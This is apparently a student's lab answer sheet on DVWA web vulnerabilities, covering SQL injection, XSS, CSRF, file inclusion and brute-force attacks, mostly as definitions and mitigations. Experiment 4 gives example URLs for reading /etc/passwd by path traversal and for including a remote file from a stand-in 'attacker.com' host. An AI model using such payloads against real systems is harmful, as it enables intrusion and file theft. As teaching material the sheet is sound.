EXPERIMENT 1

1) WHAT IS SQL INJECTION IN DVWA ?

SQL injection is a type of security vulnerability that occurs when an attacker can manipulate
an SQL query by injecting arbitrary SQL code into a query that is executed by a database.
This can happen when an application fails to properly sanitize user input before including it
in SQL statements. SQL injection can allow attackers to access or manipulate the database in
unauthorized ways, potentially leading to data breaches, data corruption, or even full system
compromise.

2) WHY IT IS CALLED SQL INJECTION ?

SQL injection is called "injection" because the attacker "injects" malicious SQL code into a
query. This injected code alters the intended execution of the SQL query in ways that
compromise the security of the application.

3) WHAT IS SQL COMMAND ?

SQL commands are used to perform various operations on the data stored in databases.
These commands can be categorized into several types based on their functionality

1 DDL (Data Definition Language)

2 DML (Data Manipulation Language)
3 DCL (Data Control Language)
4 TCL (Transaction Control Language)
5 DQL (Data Query Language)

4) WHAT TOOL IS USED FOR SQL INJECTION ?

1. SQLMap

Description: SQLMap is one of the most popular and powerful open-source

tools for automating the process of detecting and exploiting SQL injection
flaws. It supports a wide range of databases, including MySQL, PostgreSQL,
Oracle, Microsoft SQL Server, and others.

Key Features:

 Automatic SQL injection and database takeover tool.

  Supports various injection techniques (Boolean-based blind, time-
based blind, error-based, UNION query-based, and others).
 Database fingerprinting, data fetching from the database, accessing the
underlying file system, and executing commands on the operating
system

5) WHAT IS THE WEAKNESS OF SQL INJECTION ?

 Unauthorized Data Access: Allows attackers to retrieve sensitive data from

databases.
 Data Manipulation: Enables modification or deletion of database records.
 Bypass Authentication: Can bypass login mechanisms to gain unauthorized
access.
 Code Execution: In some cases, allows execution of arbitrary commands on
the server.
 Denial of Service (DoS): Can be used to disrupt services by overloading
servers.
 Compliance Risks: Non-compliance with data protection laws due to data
breaches.
 Detection Complexity: Not easily detected by traditional security measures
like firewalls.
EXPERIMENT 2

1. What is Cross-Site Scripting (XSS)?

Cross-Site Scripting (XSS) is a security vulnerability that allows attackers to

inject malicious scripts into web pages viewed by other users. This occurs
when web applications display untrusted data without proper validation or
escaping.

2. What are the types of XSS attacks?

o Reflected XSS: Injected script reflects off a web application to the user.
o Stored XSS: Injected script is permanently stored on the target server.
o DOM-based XSS: Client-side JavaScript modifies the DOM environment.

3. What do you mean by reflective XSS?

Reflective XSS occurs when an attacker injects a script that is reflected off the web
server, typically in response to a user's request. This script is then executed by the
user's browser.

4. Define Persistent XSS. Why is it called Stored XSS?

Persistent XSS (Stored XSS) involves injecting a malicious script that is permanently
stored on the target server, such as in a database. It's called "Stored" because the
injected script persists and can affect multiple users who access the affected web
page.

5. Are all web applications vulnerable to XSS attacks? Why or why not?

Not all web applications are vulnerable to XSS attacks. Vulnerability depends on
how the application handles and sanitizes user input. Proper input validation, output
encoding, and security practices can mitigate XSS vulnerabilities.
6. Is it possible to prevent XSS in most cases without any user interaction?

Yes, XSS prevention is possible through various security measures such as input
validation, output encoding, and using Content Security Policy (CSP). These
measures can be implemented without requiring specific user actions.
EXPERIMENT 3

1) What is CSRF?

CSRF (Cross-Site Request Forgery) is a type of attack where a malicious website

tricks a user's web browser into performing actions on another website where the user
is authenticated. The attack exploits the trust that a web application has in a user's
browser.

2) How do you check if your application is vulnerable to CSRF attacks?

 Manual Testing: Attempt to perform actions on your application through

unauthorized means (e.g., modifying parameters in form submissions).
 Automated Tools: Use tools like OWASP ZAP, Burp Suite, or CSRFTester to
simulate CSRF attacks and detect vulnerabilities.
 Code Review: Review the application's code to ensure proper implementation of
CSRF tokens and other mitigation techniques.


3) What’s the difference between XSS and CSRF?

 XSS (Cross-Site Scripting): Involves injecting malicious scripts into a web

application that are executed in the context of other users.
 CSRF (Cross-Site Request Forgery): Involves tricking a user into unknowingly
submitting a request that they did not intend to execute, using their authenticated
session in another web application.

4) In what ways can you mitigate CSRF risks?

 CSRF Tokens: Include a unique token in each form submission or request that
validates the origin and intent of the request.
 SameSite Cookies: Set cookies to SameSite=Strict or SameSite=Lax to prevent
cross-origin requests.
 Verify Origin: Check the Origin or Referer header in requests to verify the request's
origin.
 Double-Submit Cookie: Use a separate cookie value sent as both a cookie and a
request parameter to validate the request.
 Custom Headers: Use custom headers or authentication mechanisms that cannot be
automatically included in a cross-site request.
5) Mention some examples of how a CSRF attack might occur?

 Unauthorized Transactions: An attacker tricks a user into clicking a link that makes
a transaction (e.g., funds transfer) using the user's session in a banking application.
 Changing Account Settings: An attacker forces a user to change their password or
email address on a web service without their knowledge.
 Social Media Post: An attacker posts a message or shares content on a social media
platform using the victim's authenticated session.
 Data Manipulation: An attacker modifies data, such as deleting records or updating
settings, by exploiting the victim's active session in a vulnerable application.
EXPERIMENT 4

1) What are the different types of file inclusion?

File inclusion vulnerabilities typically fall into two main types:

 Local File Inclusion (LFI): Exploits the ability to include files that are
already present on the server.
 Remote File Inclusion (RFI): Exploits the ability to include files from a
remote server.

2) What is remote file inclusion?

Remote File Inclusion (RFI) is a type of vulnerability where an attacker can

manipulate input parameters to include files from a remote server into a web
application's execution context. This allows the attacker to execute malicious
code hosted on their server.

3) Why is file inclusion possible?

File inclusion vulnerabilities arise due to improper input validation or

sanitization in web applications. When input parameters (such as file paths or
URLs) are not properly validated, attackers can manipulate them to include
arbitrary files, leading to security breaches.

4) Differentiate between local file inclusion and remote file inclusion?

 Local File Inclusion (LFI):

o Exploits include files that already exist on the server.
o Files are typically included using relative or absolute paths.
o Example: http://example.com/index.php?page=../../../etc/passwd
 Remote File Inclusion (RFI):
o Exploits include files from a remote server controlled by the attacker.
o Files are included using URLs or other remote file paths.
o Example:
http://example.com/index.php?page=http://attacker.com/malicious
.php
5) What is the impact of file inclusion vulnerability?

The impact of a file inclusion vulnerability can be severe:

 Data Exposure: Attackers can read sensitive files such as configuration files,
user credentials, or system files.
 Code Execution: Inclusion of malicious files can lead to remote code
execution, allowing attackers to take control of the server.
 Server Compromise: Attackers can use file inclusion to install backdoors,
malware, or perform further attacks on the server or other systems.
 Data Manipulation: Files can be modified or deleted, leading to data loss or
corruption.
EXPERIMENT 5

1) How do dictionary attacks relate to brute force attacks?

Relation: Dictionary attacks are a subset of brute force attacks. While

brute force attacks systematically try every possible combination of
characters to crack passwords or keys, dictionary attacks use a
predefined list (dictionary) of commonly used passwords or phrases.

2) Which type of attack allows an attacker to use a brute-force approach?

Brute Force Attack: This type of attack allows an attacker to use a

brute-force approach by systematically trying every possible
combination of characters until the correct one is found. It is effective
against weak passwords or encryption keys.

3) How long does a dictionary attack take?

Duration: The time taken for a dictionary attack depends on factors

such as the size of the dictionary, the complexity of passwords being
targeted, and the computing power available to the attacker. It can
range from seconds to days or even longer for more complex
passwords.

4) What are the techniques used in preventing a brute force attack?

Techniques:

 Strong Password Policies: Encourage or enforce the use of complex

passwords with a mix of characters, numbers, and symbols.
 Account Lockout: Temporarily lock user accounts after a certain
number of failed login attempts.
 Rate Limiting: Restrict the number of login attempts per unit of time
to prevent rapid-fire attacks.
 CAPTCHA: Implement CAPTCHA challenges to distinguish human
users from automated bots.
 Two-Factor Authentication (2FA): Require a second form of
verification in addition to passwords, such as a code sent to a mobile
device.
5) What are the targets of brute force attacks?

Targets: Brute force attacks typically target:

o User Accounts: To gain unauthorized access by guessing passwords.

o Encryption Keys: To decrypt encrypted data or communications.
o Network Protocols: To exploit weak authentication mechanisms in services
like SSH, FTP, or web applications.
o Cryptographic Hashes: To crack hashed passwords stored in databases.